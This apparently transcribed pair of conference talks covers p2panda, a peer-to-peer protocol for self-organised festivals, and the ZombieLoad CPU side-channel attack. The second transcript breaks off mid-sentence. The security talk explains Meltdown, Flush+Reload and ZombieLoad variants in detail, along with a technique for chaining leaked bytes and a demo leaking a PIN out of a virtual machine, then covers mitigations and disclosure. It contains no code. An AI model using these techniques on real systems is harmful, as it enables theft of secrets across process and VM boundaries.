Okay, so first of all, thank you so much for this talk. I've heard about peer-to-panda before of course, but this is the first time I fully understood it. And the first thing that struck me was very similar to what the previous question was in a way. And it's also like, what defines festival? It could be demonstration. It could be like a bunch of people gathering around music or dancing or whatever, right? But a resource could also be like, hey, I want to contribute to this section of the code. So in a sense, what I'm hearing is also that the infrastructure that you're building was peer-to-panda is something that could potentially be used to organize around anything, almost like a DAO. Okay. Oh, that's awesome. So, blockchain. Thank you, Zelf. Yeah, I'm just thinking about something because I think that was your question answered because there's something else I would like to say about this. My question, I think I was wondering if you guys have been thinking along those lines. And also, I'd love to hear more on what your thoughts are on that. One of the things that I've been hearing from people that I've talked to about this project is like, okay, what is the problem that you're trying to solve really? What is the focused problem? And I think this is a thinking that is very common in software engineering. And I think also that you were getting at this, but we think of this more like a playground than a solution for a problem. It's like thinking what other ways could there be to get together and what new things could we do? And of course, it's wonderful if this can be applied to things that are already out there. And I think it's maybe even more interesting to see what other things we could make. Okay, thanks. Microphone 2, please. It was such a beautiful talk and I'm deeply sorry that I have a maybe a little bit depressing question. How do you keep people who fundamentally don't share your values from using P2P? How do you keep a neo-Nazi group from using P2Penda for organizing a neo-Nazi music festival? Or is it a situation where it is a tool and you can use the tool for good or for bad? I mean, that's a very common question and problem in the peer-to-peer space, which is not answered. I think for myself, I can just say, I don't know, I see Nazis on the street. I see them probably on the internet as well. The problem is it's a real problem. I see it anywhere and it definitely also happened in that space and I don't think that any space protects you from that really. But one very practical answer is it's possible to block malicious peers or peers who just don't want to be replicating their data with. So there can be some sort of social network which trusts each other but also prevents certain groups to not be part of it by just blocking these peers. This is how, for example, Scuttlebutt is also doing it right now and I think kind of also the only way right now. I know there's one person in the Scuttlebutt gang doing research on that. It's a PhD, when do you publish it? In March. What can we read about it? Cblgh.org. So that's really interesting research which has to be done but I think blocking is one way and probably one way in the long term is to make use festivals with peer-to-partner and change our society so that we don't have those problems in the future. So any more questions? Microphone 1, I see. So perhaps before or beyond the Nazi question. How can I say, I have always these provocative questions for anyone who is in tech. How can you imagine apps or whatever that actually foster live communication instead of bringing it down and replacing it through digital communication and that would be in one sense a constructive critique that I would like to make to you because coming from the arts. Although I'm very seduced by the idea of not curating, I'm very seduced, I'm even more seduced about bringing down authorship, I would say, but anyway I'm very seduced. How can you, I mean it's not very inclusive to have an app like that. I mean it's reserved to the people that can master it. It works well in Berlin but, well, so what would you say to that? Yes, I think you are right that if you create a technological system, yes, you exclude people who might not like or might not be comfortable using it. I think also if you're using a social way of interacting, could also exclude people who are not comfortable using that. I think best thing would be to have both. And in this case, what's for me very interesting is that this creates an affordance like the resources that might be in here. They might be out there now, but I don't know about that. And just by having it presented to me, I hope that it creates new ideas or thinking outside of the box that wouldn't be there otherwise. And the best thing would be to have a mix of all kinds of interaction and creation processes. Especially if you do it in a physical space, there's always lots of talking to people and just doing things and you don't need to do this with the software always. Good. We have one more question from the internet. Signal Angel, before you get cold. Thanks. Put a code on. I think the question is a little bit related. How do you plan on tackling abuse and controls on the platform? Are there any concepts for that? Maybe nothing. What I said before about these known problems, not in the Fediverse, that's another example. There's the same thing with Nazis having their own instances. Frauds. We are right now considering that you have to follow a person before you start replicating the data with them. So there's an opt-in into choosing if you trust someone, if you want to replicate the data with that person, with that peer. So this is one barrier you have to maybe go through first. Did I forget something? Yeah, maybe. Okay, thanks. Michael, for one, please. Thank you for your talk. I think it's a really cool project. I was wondering if you have a planned target user group and if you think about threats to them. Because we heard about protest groups and I was wondering what is your idea of, let's say, I work for the police and I make an event or a festival to arrest people. So I think it's a very great project but I was just wondering what is your recommendation for usage or your ideas on where it shouldn't be used or should be used? Yeah, I mean, I don't have a clear answer to that except of, and I think maybe, I hope this came through in this talk, it's like technology is not only technology but also the people you are surrounding yourself with and how you communicate it. So this is why we want to work with Scuttlebot, for example, and not make a blockchain application. There's great people in that industry as well but there's also many people we don't agree with. And also it's a completely different narrative surrounded by it and maybe not voluntarily, maybe these projects are great but still the vibe is there. Scuttlebot has a vibe which is just fantastic and the police would usually not start looking there because there's this wrong community of great people and great energy. And this is not done with technology, this is just people and communities. And I think this also goes a little bit for our work with Blattreithausen. I mean, you've seen it a little bit, we come from an underground noise scene, experimental music scene. This is not the big festivals, this is not a big pop festival. So I think also already this is maybe even more important than the actual part of the software and I think this is always what we think about before we actually build it. So it's like, yeah, who are you identifying with, how do you communicate it? It's maybe different than if we would have started like a software project right from the beginning, would have communicated it just as a software project and then throw it on artists. That's a different story and I think this is maybe a little bit how you can steer it but of course we don't have full control of that. Thanks. Great. And I think also that in order to really control it in order to really prevent this, we would have to embed mechanisms that we don't want to embed. Like we would have to have exactly the authoritarian mechanisms in order to be sure that this never happens. Good. Microphone 2 please. Thank you for this really interesting talk. I would like to shift the conversation back to the artistic perspective. What I find fascinating and what you did is the way in which platform culture converges with platform art or platform based art, which I think we're starting to see more and more now. It seems to me like what you've done is taken this, the construct of a festival, broken it down to its possible components in a modular kind of way and allowed people to kind of like extrapolate that and use it in their own way. But still, and this is not intended as a critique, it's a curiosity, would you say that because of the particular structure of your platform, you see repetitions in the types of festivals that people are creating because they're basically using similar modular units that you've sort of kind of made accessible. Have you standardized the concept of a festival and to what extent? Very good question. Thank you. I think this is a little bit, I think that something we are thinking about so far, our answer to that was build a new platform for every festival. I mean, you see that all of these platforms were built from scratch for each festival. They have a completely different name, they have completely different settings, so it doesn't become that thing of like okay, there's transmediate, we're going there every year, it's super boring and nothing changes. And it's just like maintained for 20 years and you could have also just like start something new from scratch all the time. This is a little bit our philosophy, we want to build new things all the time from scratch also to not fall into this thing of like structuring it too well. And also for the participants who maybe came to both festivals, they couldn't, they could relate to it a little bit in the sense of maybe you get used to the chaos. That's maybe one aesthetic or characteristic of these sort of festivals. There's a certain chaos element some people don't like and I understand them very well. It depends on your mood maybe and how you feel right now. And I think, yeah, but I think this is this is very important questions one has to, I think, once again, like, look at outside of the technology how do you announce the festival and what groups do you announce it. This already shapes shapes the festival a lot. It's not so much the technology and also I once again or maybe actually the first time I'm saying it. I mean, I mean, right now there's three developers on stage. I'm an artist as well, but musician, but we also have technical backgrounds. The rest of our association doesn't. I think if you would have put a person here on stage, which is, which is not us, then you would have heard a completely different talk. And this is the good thing. I think this is a really nice thing. Like you, there's many people who actually come to the festivals and they don't use the platform once. They just made or what happened was someone booked a 24 hour slot in the basement and just made a noise festival outside of everything. So these things can happen and and they're great. So people start like finding their own paths within it or ignore it completely. One more one more thing in addition to that in the Lieberkhausfein, which was kind of like an umbrella for these kinds of projects. We also tried to think of this by having a specific chaos officer. So this is a person in our fine whose responsibility is to watch our processes and when things become stable to just bring some chaos, just destroy something. I think that's very important. Okay. Thank you. Michael from one, please. Hi. I have a very practical question. We just started organizing MCH, which will be a hacker camp in the Netherlands in 2021 with about 4000 hackers in empty grass field. You know what it's like. I'll be coordinating the musical program. Preferably we don't have mainstream bands, but also not too experimental that nobody shows up. So hopefully we will have every subgenre presented on the camp. So how can I use peer to panda to mobilize the musical taste of all the participants without giving too much attention to one who shouts the loudest, but get all the subgenres presented on stage. So could you, for example, organize taste groups or moderate or have a Spotify list and people vote or please help me out with that. So I think that is quite difficult to do if you also give control to everybody else like you give up control in this sense. I think what you can do is to create some kind of expectation by saying this is the kind of music that we like. But after all, I think that you really have to give up control and see what happens. And it could be that it's not exactly the thing you like, but it could also be really great. So the music people like in general, so that they might organize some peer to panda on certain musical genres or something like that. Would that be possible practically? Of course. I mean, this is a very open source thing to say, but you can hack it yourself. We will. This is an interesting thought like how can we embed being able to set expectations as the person who first creates an event or maybe even to give the possibility to the group to communicate expectations to everybody else. Like what kind of mix of music would be nice. Interesting idea. So it doesn't have a voting system? You mean a voting system to do what? Yeah, you get a big list of bands and people can just vote. I mean, this could be something like you could have a band that is requesting access to the main stage at the prime time. And then what kind of authorization mechanism do you use for this? You could have an authorization mechanism that gives everybody who attends the festival the option to weigh in on this question and say, yeah, I don't really want to see them. And if there's a majority, then they go. Okay. That sounds cool. Thank you. So thank you very much again for your talk. And round of applause, please again. Thank you.
Festivals and events are organized by a small group of deciders. But what would Eris do? (chaos!) We will look at some of our experiences with decentralised festivals where every participant can truly participate, reflect on how they influence our way of discussing and producing art and technology and discuss p2panda, an idea of a p2p protocol for (self-)organising resources, places and events, which is based on the SSB protocol. This is a technical, artistic, theoretical reflection on how we use technology to run and experiment with decentralised festivals. VERANTWORTUNG 3000 (2016), HOFFNUNG 3000 (2017) and now p2panda are platforms and protocols to setup groups, festivals, gatherings, events or spaces in a decentralised, self-organised manner which allow us to raise questions on how we organise ourselves in our social, artistic & theoretical communities. In this presentation we want to: Show work and reflection processes of BLATT 3000 and Liebe Chaos Verein e. V. i. G. in Berlin on how technology informs art production and how these systemic "meta"-questions can be made the actual means of art, theory and discussion. Introduce some technical key-concepts of the p2panda protocol and how offline-first, append-only data-types, user authorization through cryptographic keys are interesting for ephemerality, self-organization, non-individuality, decentralization and anonymity in art and theory production. Present fictional ideas for festivals of the future. Talk about pandas.
10.5446/53168 (DOI)
You probably remember the Meltdown attacks in 2018 and it was a pretty big flaw in modern CPUs and the CPUs that came afterwards got fixed. They probably seem to be fixed and the problem Meltdown seems to be solved. Well, Michael, Moritz and Daniel, they will show us that this is not the case. A new attack named Zombie Load is possible and in the following hour we'll learn all about it. Please give a really warm round of applause to Moritz, Michael and Daniel. Thank you for this introduction. Welcome everyone to our talk about the Zombie Load attack. So my name is Michael Schwarz. I'm a postdoc at Graz University of Technology in Austria. So you can find me on Twitter, you can write me an email. I will be here the rest of the Congress anyway. So if you're interested in these topics or anything around that, just come talk to me. We can have a nice discussion. My name is Moritz Lipp. I'm a PhD candidate in the same office as Michael and Daniel. You can also reach me on Twitter, just come and talk to me. Yeah, and my name is Daniel Gruß and I don't know, I don't have to repeat all of this. No, but before we dive into Zombie Load, we will start with some... Wait a second, Moritz, wait a second. I added a last minute slide. You don't know about that. You cannot just add a slide. It's important. I mean, it's right after Christmas, right? And we all remember this. Come on, oh, come on. You're kidding. And last year, last year at CCC, we also had this Christmas-themed talk, right? And now we all hear this still ringing in the ears. And this was a really nice talk, I think, as well. And we presented a lot of new Spectre and Meltdown variants there. Maybe not as dangerous as Zombie Load, but still, I think, interesting. And when we presented this, this was uploaded to YouTube afterwards. And I was running around in a suit at that point and someone wrote, ditch the suit, please. He looks so uncomfortable. And today I have a T-shirt that's much better. And we presented, in this talk, we presented a tree, a tree, a systematization tree. And you can see all the different attack variants here, Spectre-type attacks, Meltdown-type attacks. And yeah, so the question is, how does this all relate to Zombie Load? And to start that, I think we will just present Spectre in a nutshell. Yes. And I think... That's Spectre in a nutshell, yes. Yes. And maybe something more. There was also this song about Spectre. Do you remember this song about Spectre? I think they also had a movie with that title. Yeah. Yeah, this is about the most technical explanation that you will get about Spectre today, because the relation from Spectre to... Oh, come on, Daniel. Zombie Load is not that... We are here to give a technical talk, not some goofing around here. So maybe we need some background first. Okay. Have a really technical talk here, right? So can you explain microarchitecture? I mean, of course I can. I mean, that's really easy. So we all know we have a CPU. And then we have some software that runs on the CPU. That's what we always do. And the software has this ISO. It can use this instruction set architecture like x86. So this application can use all the instructions defined by this instruction set architecture and the CPU execute step. And of course the CPU has to implement this instruction set architecture to actually execute the instruction. This is what we call the microarchitecture. Could be, for example, an Intel Core, Xeon, or some AMD Ryzen, stuff like that. And CPUs are really easy. I learned that in my Bachelor. So when you want to execute a program, there are just a few steps that the CPU has to do. So first, it fetches the instruction, it decodes the instruction, it executes the instruction. And then when it's finished executing, it writes back the result. Yes. It's really easy, you see? Yes. But this is a very high level. I think we should go a bit more into details if you're asking for that. So maybe to go a bit more into details, we should look what these boxes actually do. Let's start with the front end. In the front end, we will have some part that decodes the instructions that we send to the CPU. There is already a lot of parallelism in there. And also we have a branch predictor which tells us which micro-op codes we should execute next. There's a cache for that. And we have some MOOCs that combines all of this. And then we have an allocation queue which determines what the next instruction will be and sends that onwards. We also have an instruction cache. Of course, we need to get the instructions from somewhere. And of course, the instruction translation, look aside, buffer, the ITL be connected to that. This one basically translates addresses from virtual to physical. Yes. The next step would be the execution engine. In the execution engine, we have a scheduler and a reorder buffer. The reorder buffer, although it is called reorder buffer, it actually contains all the micro-ops in order, in exactly the order in which they should be executed. It's called reorder buffer because the scheduler just picks them as soon as they are ready and then schedules them on one of the execution units. For instance, there are some for the ALU. There are some for loading data, some for storing data. And yeah, it just schedules them as soon as possible and then they are executed there. And as soon as they are finished executing, they will be retired from the reorder buffer and that means that they will become architecturally visible to all the software. And if something fails? Yeah. If something fails, if something fails, you mean a CPU exception? For instance, yes. Yes. Then, of course, the exception has to be raised and this happens at retirement. So first, the execution unit finishes the work and then the exception is raised and all the things that the execution unit did are just kicked out, just thrown away. So then we go to the memory subsystem. Of course, if we want to make changes, we don't want to keep them in some internal registers. We want to store them somewhere, maybe load data from somewhere. And for that, we have the load buffer and store buffer. And the load buffer and store buffer, they are then connected to the cache, the L1 data cache and we again have a TLB to translate virtual to physical addresses and the line fill buffer to fill cache lines in the L1. Also for some other purposes, but we will get to that later on. Yes. And caches, I think I also talked about caches. We know about caches. That way we've heard that term. Yes. So we can do that pretty easy. For instance, you have a simple application just accessing variable I twice. The first time, it's not in the cache. So we have a cache miss. So the CPU has to ask the main memory, please give me whatever is stored at this address. The main memory will respond with the value and store it in the cache. So the second time you try to access this variable, it's already in the cache. So it's a cache hit. And this is much faster. So if it's a cache miss, it's slow because we need a DRAM access. On the other hand, if it's already in the cache, it's fast. And if you have a high resolution timer, you can just measure that by measuring how long it takes to access the address. Can you really do that? Yes. I implemented that. And as we can see, around 60 cycles, if the data is stored in the cache and around 320 cycles, if it's a cache miss and if we have to load it from main memory. Oh, wait, I remember something. So we learned something at the university about these caches and cache hits and misses that we can use that for attacks. So there was this flash and reload attack where we have two applications, an attacker and a victim. We have our cache and we have some shared memory. For example, a shared library like the libc. And if shared memory is in the cache, it's in the cache for all the applications that use it. So if we have, for example, an attacker that flushes it from the cache, it's also flushed for all the other applications from the cache. So here, my cache has like four cache sets here, four parts, and the shared memory is in there. It was used before. So as an attacker, I can simply flush it from the cache. That's not in the cache anymore. It's not cached anymore. Then an attacker can simply wait until the victim is scheduled. If the victim accesses the shared memory, it will, of course, be in the cache again. That happens transparently, as you just explained. And then as an attacker again, when an attacker is scheduled, it can simply access the shared memory and measure the time it takes. And from the time, the attacker can infer whether it's in the cache, if this access is fast, and then the attacker knows that the victim accesses the shared memory. Even if the victim is slow, it was not accessed in the meantime, and it has to be loaded to the cache again. It's really simple. Yes. You paid attention in my lecture, I see. But actually, there are some more details that we might want to show here. So if we look at the cache, how a cache actually works, a cache today works not by just having these cache lines, but it divides these storage locations also into so-called ways. And they group these ways into a cache set. So instead of a cache line, we now have a cache set. And the cache index now determines which cache set it is, and not which cache line. So you have multiple congruent locations for data. The question then is, of course, how do you find the right data if you want to look something up in the cache? And for that, you take the remaining bits. So the lowest bits are the offset, and then we have n bits for the index, and the remaining parts, maybe the physical page number, is used as a tag. And this tag is then used for the comparison. And if one of the tags matches, we can directly return the data. I prefer my simple cache. It's a lot easier. So if we combine the cache attack that Michael showed us with the thing that Daniel told us in the beginning, that exceptions are only handled when an instruction is retired, we can build the Meltdown attack. So let's talk about Meltdown in the beginning, because this is an attack that we built up on. Yes, Moritz, I think for Meltdown, I mean, we already saw Spectre. You had it in this slide. I think there was a song about Meltdown, wasn't there? That's not about the Meltdown attack. No. They sing about Meltdown, and it's clearly related to Meltdown. And this sounds serious, yes. But let's get back to the real attack. So it's really simple, we just access an address we are not allowed to access, which makes an application crash, but we can take care of that. So a page fault exception happens. And what we do now, we use this value that we read, which we illegally read, but it's still executed that way, and encode it in our lookup table in the cache. So here, the value is k. So what we do is, we access the memory location on the left of the user memory where the k is, which means this value is loaded into the cache. And now what we can do is, after we executed this illegal instruction and recovered from the fault, we can just mount the Flash and Reload attack on all possibilities of the alphabet. And at letter k, we will have a cache hit, so we know we read the value k. Yes, this is nice, but this doesn't really explain why this actually works. So let's look at the micro architecture again. The meltdown attack, actually the instruction that performs the meltdown attack is just one instruction, one operation that loads from a kernel address, moves something into a register. That's it. That's the entire meltdown operation. Now we have our value in a register, and now we can do with it whatever we like. We can transmit it through the cache if we like, but we could use any other way. The meltdown attack is this reading from the kernel address that actually ends up in our register under our control. Now this enters the reorder buffer, it will be scheduled on a load data execution unit, and then it will go to the load buffer. In the load buffer, we will have an entry, and this entry has to store approximately something like the physical page number, the virtual page number for the virtual address. The offset, which is the same for virtual and physical pages, lowest 12 bits, something like that, and a register number. If you're familiar with register names like RAX, RBX, RCX, and so on, those are just variable names that are predefined. There's actually a set of 160 registers, and the processor will just pick one of them, independent of your variable name. And then yes, we access the load buffer here, and in the next step, we will do a lookup for this memory location in, oh, sorry, we first have to update the load buffer, of course, we have to get a new register, right, this is the old values, the new values are marked in red, the register number, the offset, and the virtual page number are updated. The virtual page number is not used for the lookup in L1, store buffer in LFB, we only use the lowest 12 bits, the offset here, and then what happens next is we do the lookup in the store buffer, in the L1 data cache, in the LFB, and also in the DTLB we check what is the physical address, we get this from the DTLB. Now in the next step, we would lookup in the DTLB, so what does this entry say, and it says, oh yeah, I have a physical page number, it's present, and it's not user accessible, but the fast path, what the processor expects is always that this is a valid address, and it will in the fast path copy this physical address up here, at the same time realize that this is not good, I shouldn't be doing this, but also, I mean, the virtual address matches, the physical address matches, why wouldn't I return the data to the register? And then the data ends up in the register, that's the meldon attack on a micro architectural level. So how fast is this attack, this is one question, and the other is also why does the processor do this, and there's actually a patent, or multiple patents actually writing about this, and it says, if a fault occurs with respect to the load operation, it is marked as valid and completed. So in these cases, the processor deliberately sets this to valid and completed, because it knows the results will be thrown away anyway, so why not let it succeed. So how fast is this attack? Actually it's pretty fast, so it's 550 kilobytes per second, and the error rate is only 0.003 percent. Yeah, I can confirm that, so I also implemented that, and I put a secret into a cache line, a known secret in kernel memory, and then when I try to leak that with this meldon attack, we've just seen, then I get the values, and also p in there, and x is the secret, x is the secret I put in there, p, some noise I guess, so it's a bit noisy, as you said, and like this error rate from before. I'm not exactly sure what this noise is. And actually Intel explains that in more detail in their security advisory, so for instance on some implementations, speculatively probing memory will only pass data onto subsequent operations if it's resident in the lowest level data cache, the L1 cache, as we've seen now. This can allow the data in question to be queried by the malicious application leading to a side channel that reveals supervisor data. Wait, I'm not sure it's correct. For me it also works on the level 3 cache. But they say it's only 1. Yeah, but it works. I implemented that. You tried it. And it's also, it's not as fast anymore, yeah, it's just around 10 kilobytes, the error rate is 10 times as high as before, but still it works. So I removed it from the L1 cache, just have it in the L3 cache, my secret x again in kernel memory, and then I try to leak it, I get the x, the P, P, P, P. Look, they're Qs as well. But it's also the x in here. There's some x's in there and a bit of error. They're more x's than other letters, but still. Yeah, but I can see the secret. But how can you get rid of that? So if you read a P. Yeah, I don't know. How can I get rid of the noise? So I need to get rid of the. No, I can't hear anything. Noise cancelling headphones to get rid of the noise. Yes, yes, yes. No, you just throw statistics on this. That's basically the message here. Just throw statistics on that and it will be fine. Makes sense. And even if I think about what happened last year, so we presented the Meltdown attack at Black Hat and then we had one slide because we did one additional experiment because we said L1 is not a requirement because we can use uncashable memory where we mark pages as uncashable in the page tables so the CPU is not allowed to load them into the cache. Wait, but if I do that, it doesn't work. So if I remove it from the L3 as well, I don't have the DRAM, my secret X, and I try that I don't get it at all. I just get random noise here. Did you read this slide? No, it just said something about not in the cache. But there was more on the slide. So I always can't read from that. But only if we have a legitimate access on the sibling hyper thread. So this is a legit access to this memory location that you try to leak. Did you try it that way? So you mean I have to leak it and in the meantime have a legitimate access from somewhere else? Yes, then you can just grab it from the other one. That works. I told you. I really should continue reading after the first point. Maybe that helps. So okay, there's some noise in there, but yeah, that works. And if some people remember what we wrote in the paper back then, which I want to quote, we suspect that Meltdown reads the value from the line fill buffers. As the fill buffers are shared between threads running on the same core, the read to the same address within the Meltdown attack could be served from one of the fill buffers allowing the attack to succeed. However, we'll leave further investigations on this matter open for future work. I don't like this sentence, like you always leave the stuff you don't want to do for future you. Yeah, fuck future. Yeah, but I can understand that at this point we had some kind of mental resource exhaustion already, but all this new stuff there. Okay, so maybe back to the technical details, right? We want to understand why this works, right? And if we look at this diagram again, it pretty much is the same as before. We have our load operation. It goes through the order buffer, through the scheduler to the load data execution port, and then has an entry in the load buffer, and there we will still update the same entries. Everything's the same so far, but now we know that it is not in the L1 data cache. So even if we do the look up there, we are sure that we won't find it there, but there are other locations where we can still get it from. And that's why Meltdown Uncashable works. It just gets it from a different buffer. Yeah, what else could we do with this? I mean, future work should probably investigate that. Yeah, future work, of course. Yes, sure. I mean, at some point you're at this point where future U becomes present U, and you actually have to do the stuff you said this should be future work. So yes, at some point we arrived at this point where we said, okay, we have to do this future work here. Yes. And maybe also here is a good point. Using all these works that we published here in this area, Meltdown Spectre, Zombie Load, what we learned was that actually there is no noise, and this has become pretty much a mantra in our group. Every time someone says, oh, there's a lot of noise in this experiment, there is no noise. Noise is just someone else's data. So what you say is we should analyze the noise, right? Because maybe it's something interesting. So maybe we do it in a scientific, mathematical way. Like this lemma here, like noise is someone else's data, and we take the lemus here of Meltdown, because if you have Meltdown and this noise and we let the Meltdown attack go to nothing, then we are left with the noise, right? I don't think this is an appropriate use of lemus. I don't think that works. Well, it looks science-y. Yes, it does. So, from the deep dive for Intel Stasis, fill buffers may retain stale data from prior memory requests until a new memory request overrides the fill buffer, like Daniel showed in the animation. Under certain conditions, the fill buffer may be speculatively forward data, including stale data. So under certain conditions, we can read what someone else's instruction or program read before. To a load operation that will cause a fold or assist. So we just need a load operation that falls, and with that, we can leak data. Wait, assist? What is that? That sounds confusing. Let's look at that with an experiment, right? We are scientists. So let's look at a simple page here and this page contains cache lines, as you explained before, and then we have some virtual mapping to this page. And if you remember Meltdown, as we had before, then we have this folding load on this mapping because it was a kernel address. It folded there, and that was like this scenario of Meltdown. But now we need some complex situation or something, so let's map this physically page again with a different virtual address, so with a different mapping. And then we do something complicated for the CPU. So we have one access that's folding, and we have a different access in parallel to the same cache line that removes it from the cache. The same thing we want to access in the cache. What would the cache do then? What would it return? It might get out of resources there. It's like, oh, super confusing. So that's a certain condition, I would say. Okay, so maybe we should also look at that zombie load case in more detail in the micro architecture again. And in the micro architecture, we start again with the same single instruction. It's all the same. The difference between these attacks lies in the setup of the micro architecture, not in this specific instruction that is executed. And what we see here is that we again go through the same path, and this time the load buffer entry is again updated, and again, this part is not used for the lookup in L1 store buffer and line fill buffer. The lookup happens, but here now there's a complex load situation as Michael just described. So the processor realizes, I'm not sure how to resolve that, right? And says, I will stop this immediately. And now we have an interesting problem here, because what happens? The execution port still has to do something. It still has to finish something, and it will finish as early as possible. And now, I mean, we have a PPN, we have a cache line that matches, so why not return this one? And then we can just read any data that matches in the lowest few bits. Very nice. So this is basically used after free in the load buffer. So it's a software problem in the hardware now. Oh. Great thing. But how do we then get the data out of that? I mean, it still dies, right? Yeah, but it's the same thing as in Meltdown. So instead of accessing the kernel address, we just have a folding load with a complex load situation. It's the same thing. And then again, we encode the value in the cache, use flush and reload to look it up, and then we know exactly what was written there. OK, so I can do that. So I can really build that. It's not only theoretic. I can get to this complex situation here, actually, in software. So if I look at my application, I have the special address space, with user space and kernel space. If I allocate some physical page in physical memory, I get a mapping in user space. And then I need a second mapping. How do I get that? It's a nice thing, really convenient. The kernel maps the entire physical memory as well in the direct physical map. And so for every physical page I have, there's also a kernel page that maps this physical page. So I have this situation as before here. Ah, so the physical memory and the virtual memory are not the same size then? No, of course not. Virtual memory is a lot larger than that. But with that, I have one physical page mapped with an accessible page and mapped with an address I cannot access. That's one of the variants. Variant one was the easiest to come up with. I also have another variant, variant three. So I have this physical memory. I can map a page and use a space simple allocated page. And then I use shared memory. If I have shared memory with myself, I have two addresses to the same page. Wait, wait, wait. Shared memory that shouldn't fault. Yes, that's correct. So it still does. There's a nice trick with that. So of course, I can access that. It's my shared memory. I set it up. But there's something really interesting in the CPU. There's so-called microcode assists. So if you have the instruction stream that comes in, it has to be decoded. We have a decoder that can decode a lot of things to microops. And these microops then go to the max somewhere and to the back end. And we had that before. I listened to what you said. So yes, we have that decoder going on, back end, scheduler, blah. But sometimes there's something complicated. So maybe the decoder can't decode something because it's really complex and it needs some assistance for that. A microcode assist. And it goes to this microcode ROM, the store software, program software sequences that can handle certain things in the CPU. And this microcode ROM then emits the microops that are used in the back end. So it was not in my figure. No, this was interesting, complicated things here. So this is for really rare cases. So that shouldn't happen a lot of time because this is really expensive. Has to clear the ROM, insert microops into the scheduler. So it's really complicated. It's a kind of a fault in the microarchitecture, a microarchitectural fault. This happens, for example, in some cases. And one of the examples is when setting the access or the dirty bit in a page table entry. So when I first access a page, then this microarchitectural fault happens. It needs an assist. And then if we do that the first time, then it's a fault. And a nice thing on Windows is regularly reset. So we always have a fault all five seconds. All this stuff about the zombie load attack, I think we also want to think about something else here because for Spectre there was a movie and a song for Meltdown. No, no, no, no, no, come on. There's no zombie load. Just a few seconds maybe. Everyone knows that. There's no zombie load in there. Every time in my cash I see noise. That's the original. That's the original, yes. It's completely unmodified. No. Leaking from the fill box and come on. I'm sure this is the original. I got this from the Internet. We can continue playing it if you like. Maybe later we need to discuss things. So what can we actually attack with zombie load? So what we know is we can leak data on the same and from the sibling hyper thread. So what we can do is we can attack different applications running on the system. We can attack the operating system. We can attack SGX englaves. We can attack virtual machines. We can also attack the hypervisor running on the system from within a virtual machine. So it's really powerful but we still have a problem there. So for Meltdown it was really easy. You provide the entire virtual address, leak the data from there. For foreshadow you can provide the physical address, you leak the data from there. All are different attacks. You can at least specify the page offset. But for zombie load you can only specify a few bits here in the cache line. So there's not really control there. You can't really mount an attack with that. That's it. So we end here. It's impossible. No. It's not impossible. It's possible. So what we can do is we call it the so-called domino attack. So what we do, we read one byte and what we then do is we use the least significant four bits as a mask and match that to the next value that we are going to read. And if they overlap and are the same, we know that this second byte belongs to the first byte and we can continue and continue and read many, many bytes following after each other. So despite using, we have no control. We have really much control. Oh, that's nice. So I really implemented that. It's demo time. I hope it works. Let's see. So I need a credit card pin from someone. We don't see anything yet. I know. I know. Oh, no. Oh, no. What is my password? Oh, it's secure, right? Ah, yeah. No one tries a one-letter password. Okay. So where's my? I have here this. Okay. Easy passcode. What is it? Oh, it stores all my secure passwords in there. Okay. And you use a pin for that. Yes, my credit card pin. Anyone wants to give me that four digit credit card pin? I can try to leak that here. Yeah. Yeah. Oh, no, that's boring. No one has one, two, three, four as a credit card pin, I hope. And it runs inside a virtual machine without internet so nothing can leak here. Different code. It looks staged if we do that. Anyone else? Okay. 1337. Let's see. I think, well, you can do multiple numbers. Three. Seven. Nice. Nice. Live leakage, although it's in the VM without any internet connection, without anything, just some reload, leaking the things by input inside my virtual machine from the outside. If you do that again with a different number. Yeah, because no one believes that, right? Yeah. Okay. Let's see. Different number. Oh, no. Anyone? 1280. 1280. Yeah. Yeah. That really works. Okay, nice. I can actually steal data with that. Nice. So the question is what else can we do with that? Can you do something else? I don't know. Did you prepare any other demos? I need to find the slides again. You go back to the slides. Ah, there. So only this one demo. Oh, that's a... No, you find another one. Okay. Just a second. I find this very odd, right? There's variant 1 and 3. Isn't that odd? No, we use the trinary system now to count. Trinary system. Okay. Whatever. No, we shouldn't skip here. So we have different attacker models on the one hand with variant 1 as a privileged attacker where we have the kernel address and stuff like this. We can do this on Windows and on Linux for the microcode assist for variant 3. We can also do that as an unprivileged attacker on Windows because it clears the bit in the page table. So it's cross-platform. That's nice. Yes. Okay. How fast is it? It's 5.3 kilobytes per second for variant 1 and for variant 3, 7.3. That's not so impressive. I mean, if I want to make a logo and a website and everything, this won't... We need to get better than that. But it's a bit bad, right? Yeah, we should still mitigate that, right? Yeah. Yeah. So it's like disable hyperthreading. No, not practically. It works across hyperthreads, so we can disable that. Group scheduling is more realistic. Yeah, but this is so hard to implement. We can also override the microarchitectural buffers so that if the data is not there anymore, we can't leak it. So it might be a bit over. There's this instruction that was updated that overrides all the buffers with just a bit of cost there. There are also software sequences that can evict all the buffers, so there's no data there anymore. Which is quite odd because the software shouldn't see the buffers. Okay, then we buy new CPUs. Learn new CPUs, which are not affected anymore. That's a good thing. So 8th, 9th generation, like the Coffee Lake and then the Cascade Lake. So Intl.Ses on the website, like it fixes Matdown, Foreshade, or Riddell Fallout, MLPDS, MDSum. So all these attacks there. You copied this from the website? Yeah, it's from the website. Why is there three questions? There's no zombie load in there. I don't know. So they didn't say anything about zombie load on a website? Maybe it's fake. We'll see. We'll see. Okay. So if we go back to the timeline, we have been working on attacks in this direction already in 2016, and the Kaiser patch was actually a mitigation for a related attack. And we published this on May 4th. And in June, Jan Horn reports the Meltdown attack. And later this year, we also reported independently that the Meltdown attack. Much later though. Yeah. Yes. So in February 15, we reported Meltdown Uncashable because Intl said, no, you can only from League One, and we said, no, you cannot only League from L1. So we implemented this proof of concept. Yeah, we had quite some emails exchanged. We made it more nice than send it again on March 8th. It was also difficult to convince our co-authors, actually, that we can leak data that is not in the L1 cache. But finally, before the paper was submitted, actually, we were able to convince them with a referencing pop. And we also explained there's a line fill buffer leakage on May 30. We reported Zombieload then on April 12th in 2019. Zombieload went public shortly afterwards because it was already under embargo for a long time. How convenient. At the same day, there's this new CPUs announced. So I bought a new CPU because I wanted to be safe. So everything is fine. Well, it's still fine. No, well, more. It's fine. Everything is fine. Are you sure? So I'm not sure if everything is fine. Maybe we have a problem. Maybe there's a question. Which Zombieload variants works despite MDS mitigations? Variant 1, variant 3, variant 2, or none of them? I want to use a choker. You don't have any chokers. That's a beauty. So Daniel Trinary was fake? There's no such thing. None. None. No, I will go with variant 2. It's the last question. And? Yes. Yes. What did I win? Yes, it's variant 2. Wait a second. You told me that there is no variant 2. Yeah, that was choke. You really bought up? Trinary system? That's not even a word. I'm a bit confused here. There's a variant 2, so we count in 